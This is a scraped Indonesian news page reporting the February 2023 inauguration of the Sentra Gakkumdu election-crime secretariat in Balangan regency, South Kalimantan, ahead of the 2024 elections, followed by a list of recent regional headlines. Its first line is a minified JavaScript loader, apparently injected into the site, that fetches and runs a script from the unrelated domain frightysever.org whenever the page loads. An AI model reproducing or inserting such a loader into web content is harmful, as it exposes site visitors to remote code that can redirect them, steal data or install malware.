(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Balangan

Jelang Pemilu 2024, Bawaslu Balangan Resmikan Sentra Gakkumdu


KANALKALIMANTAN.COM, PARINGIN- Jelang Pemilu 2024, Sekretariat Sentra Penegakkan Hukum Terpadu (Gakkumdu) di Kabupaten Balangan diresmikan Ketua Bawaslu Provinsi Kalimantan Selatan (Kalsel) Azhar Ridhani.

Peresmian Sentra Gakkumdu didampingi Ketua Bawaslu Kabupaten Balangan, Kejaksaan Negeri Balangan dan Polres Balangan serta di hadiri Panawcam. Bertempat di Rica, Paringin Kota Kecamatan Paringin, Senin (27/2/2023).

Dalam peresmian tersebut juga dilakukan pemotongan tumpeng serta pemberian arahan langsung dari Ketua Bawaslu Kalsel, Ketua Bawaslu Balangan, Kejaksaan dan Polres Balangan.

Ketua Bawaslu Balangan Rosmelyanoor mengatakan Sentra Gakkumdu ini merupakan wadah bagi unsur Bawaslu, Kepolisian, dan Kejaksaan untuk memproses kasus-kasus tindak pidana pemilu.

 

Baca juga: Kabupaten Banjar Raih Penghargaan Adipura Lagi

“Alhamdulillah pada hari ini, sekretariat atau kantor Sentra Gakkumdu di Balangan sudah diresmikan Ketua Bawaslu Provinsi Kalsel,” imbuh Rosmelyanoor.

Ia menekankan Sentra Gakkumdu bisa digunakan dalam kegiatan rapat, pertemuan ataupun diskusi berkenan dugaan tindak pidana Pemilu yang terjadi.

Sementara itu, Ketua Bawaslu Provinsi Kalimantan Selatan (Kalsel) Azhar Ridhani menyebut, peresmian Sekretariat Sentra Gakkumdu di Balangan merupakan yang ketiga, setalah Banjarmasin, dan Hulu Sungai Selatan (HSS).

“Sentra Gakkumdu diharapkan dapat menjadi wadah terhadap persoalan-persoalan yang terjadi di setiap tahapan-tahapan Pemilu,” harapnya.

Baik itu aspek kerawanan Pemilu, tambah Azhar ataupun berkenan terhadap fokus pengawasan yang dilakukan oleh pengawas pemilu di Kabupaten Balangan. (Kanalkalimantan.com/kk)

Reporter: kk
Editor: cell


Al Ghifari

Recent Posts

‎PCNU Alabio Salurkan Bantuan Korban Banjir di Desa Pondok Babaris

KANALKALIMANTAN.COM, AMUNTAI - Wujud kepedulian Pengurus Cabang (PC) Nahdatul Ulama (NU) Alabio menyalurkan bantuan kepada… Read More

13 jam ago

Represifitas Aparat saat Unjuk Rasa Mahasiswa di Rumah Banjar

KANALKALIMANTAN.COM, BANJARMASIN — Demontrasi tolak Pilkada melalui DPRD di Banjarmasin memakan korban dari mahasiswa imbas… Read More

21 jam ago

Pemkab Kapuas Siapkan Data dan Regulasi Dukung Program 3 Juta Rumah

KANALKALIMANTAN.VOM, KUALA KAPUAS - Pemerintah Kabupaten Kapuas mulai menyelaraskan kebijakan daerah untuk mendukung program prioritas… Read More

1 hari ago

Unjuk Rasa Mahasiswa di Rumah Banjar Cuma Satu Wakil Rakyat Muncul

KANALKALIMANTAN.COM, BANJARMASIN — Ratusan mahasiswa masuk ke gedung DPRD Kalimantan Selatan (Kalsel) untuk menyampaikan penolakan… Read More

1 hari ago

Sekda Kapuas Pimpin Rakor Laporan Kinerja Pelaksanaan PRO-SN 2025

KANALKALIMANTAN.COM, KUALA KAPUAS - Sekretaris Daerah (Sekda) Kabupaten Kapuas Usis I Sangkai memimpin rapat koordinasi… Read More

1 hari ago

Jaminan Kesejahteraan untuk PPPK, Pemkab Kapuas Rapat Bersama PT Taspen

KANALKALIMANTAN.COM, KUALA KAPUAS - Pemerintah Kabupaten Kapuas mematangkan langkah sosialisasi PT Taspen bagi Pegawai Pemerintah… Read More

1 hari ago

This website uses cookies.